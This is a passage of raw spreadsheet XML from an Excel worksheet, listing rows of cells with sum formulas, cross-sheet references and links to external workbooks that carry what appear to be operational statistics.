      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'27'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'27'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]28'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]28'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]28'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]28'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]28'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]28'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]28'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]28'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]28'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'27'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'27'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]28'!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]28'!$X$74</f>
        <v>217.79347826087</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]28'!$Y$74</f>
        <v>221.756151270014</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]28'!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]28'!$U$74</f>
        <v>13.6904761904762</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]28'!$V$74</f>
        <v>7.52681860036832</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]28'!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]28'!$R$74</f>
        <v>92</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]28'!$S$74</f>
        <v>653.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'27'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'27'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]28'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]28'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]28'!$Y$72</f>
        <v>9.15989159891599e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]28'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]28'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]28'!$V$72</f>
        <v>4.24723756906077e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]28'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]28'!$R$72</f>
        <v>2.8e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]28'!$S$72</f>
        <v>0.000369</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'27'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'27'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]28'!$W$73</f>
        <v>244.315406486858</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]28'!$X$73</f>
        <v>202.818752422825</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]28'!$Y$73</f>
        <v>238.021785716425</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]28'!$T$73</f>
        <v>100.000004166667</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]28'!$U$73</f>
        <v>31.2366113095238</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]28'!$V$73</f>
        <v>68.9645530501842</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]28'!$Q$73</f>
        <v>24.000001</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]28'!$R$73</f>
        <v>209.910028</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]28'!$S$73</f>
        <v>5991.640369</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]28'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]28'!$E$22</f>
        <v>5729</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'27'!H21</f>
        <v>199537</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2308975</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]28'!$I$22</f>
        <v>7245.34</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'27'!K21</f>
        <v>224292.25</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2290746.25</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]28'!$L$22</f>
        <v>58298.06</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>124.038425531915</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]28'!$W$81</f>
        <v>260.854826407526</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]28'!$X$81</f>
        <v>278.517791283826</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]28'!$Y$81</f>
        <v>275.885268074895</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]28'!$T$81</f>
        <v>40.9710648148148</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]28'!$U$81</f>
        <v>33.4892526455026</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]28'!$V$81</f>
        <v>35.9209382033968</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]28'!$Q$81</f>
        <v>9.83305555555556</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]28'!$R$81</f>
        <v>225.047777777778</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]28'!$S$81</f>
        <v>3120.81111111111</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]28'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]28'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'27'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]28'!$I$17</f>
        <v>6466.42</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'27'!K22</f>
        <v>188317.81</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>2079779.19</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]28'!$L$17</f>
        <v>64308.542</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>32.154271</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]28'!$W$79</f>
        <v>115.918008310281</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]28'!$X$79</f>
        <v>102.477802755347</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]28'!$Y$79</f>
        <v>102.27826260144</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]28'!$T$79</f>
        <v>99.9988425925926</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]28'!$U$79</f>
        <v>49.3718998015873</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]28'!$V$79</f>
        <v>45.6875927204829</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]28'!$Q$79</f>
        <v>23.9997222222222</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]28'!$R$79</f>
        <v>331.779166666667</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]28'!$S$79</f>
        <v>3969.33805555556</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]28'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]28'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'27'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]28'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'27'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]28'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]28'!$W$80</f>
        <v>79.6780684104627</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]28'!$X$80</f>
        <v>83.8772289557591</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]28'!$Y$80</f>
        <v>79.5567666258834</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]28'!$T$80</f>
        <v>38.5405092592593</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]28'!$U$80</f>
        <v>38.5040509259259</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]28'!$V$80</f>
        <v>32.9604403263761</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]28'!$Q$80</f>
        <v>9.24972222222223</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]28'!$R$80</f>
        <v>258.747222222222</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]28'!$S$80</f>
        <v>2863.60305555556</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]28'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]28'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'27'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]28'!$I$56</f>
        <v>1995.42</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'27'!K24</f>
        <v>41221.03</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>321047.56</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]28'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]28'!$R$6</f>
        <v>82.0833333333333</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]28'!$S$6</f>
        <v>83.8537717968158</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]28'!$T$6</f>
        <v>85.9499566724437</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]28'!$O$6</f>
        <v>100</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]28'!$P$6</f>
        <v>62.8095238095238</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]28'!$Q$6</f>
        <v>53.1307550644567</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]28'!$L$6</f>
        <v>24</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]28'!$M$6</f>
        <v>422.08</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]28'!$N$6</f>
        <v>4616</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]28'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'27'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]28'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'27'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]28'!$R$7</f>
        <v>170.583333333333</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]28'!$S$7</f>
        <v>189.125964010283</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]28'!$T$7</f>
        <v>187.708485395255</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]28'!$O$7</f>
        <v>100</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]28'!$P$7</f>
        <v>57.8869047619048</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]28'!$Q$7</f>
        <v>50.7778545119705</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]28'!$L$7</f>
        <v>24</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]28'!$M$7</f>
        <v>389</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]28'!$N$7</f>
        <v>4411.58</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'27'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'27'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]28'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]28'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]28'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]28'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]28'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]28'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]28'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]28'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]28'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'27'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'27'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]28'!$W$69</f>
        <v>0</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]28'!$X$69</f>
        <v>22.5925764408544</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]28'!$Y$69</f>
        <v>25.1966540548776</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]28'!$T$69</f>
        <v>0</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]28'!$U$69</f>
        <v>56.7931547619048</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]28'!$V$69</f>
        <v>67.4784760589319</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]28'!$Q$69</f>
        <v>0.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]28'!$R$69</f>
        <v>381.65</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]28'!$S$69</f>
        <v>5862.53</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'27'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'27'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]28'!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]28'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]28'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]28'!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]28'!$U$104</f>
        <v>34.3700892857143</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]28'!$V$104</f>
        <v>62.0513006445672</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]28'!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]28'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]28'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'27'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'27'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]28'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]28'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]28'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]28'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]28'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]28'!$V$105</f>
        <v>32.2764963167588</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]28'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]28'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]28'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'27'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'27'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]28'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]28'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]28'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]28'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]28'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]28'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]28'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]28'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]28'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]28'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]28'!$E$16</f>
        <v>4098</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'27'!H31</f>
        <v>128063</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1501070</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]28'!$I$16</f>
        <v>6047.37</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'27'!K31</f>
        <v>139371.64</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1495419.77</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]28'!$L$16</f>
        <v>54120.73</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>72.1609733333333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'[11]28'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]28'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'27'!H32</f>
        <v>103074</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1630917</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]28'!$I$13</f>
        <v>3112</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'27'!K32</f>
        <v>94422</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1115900</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]28'!$L$13</f>
        <v>45580.156</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>91.160312</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]28'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]28'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]28'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]28'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]28'!$U$76</f>
        <v>4.01785714285714e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]28'!$V$76</f>
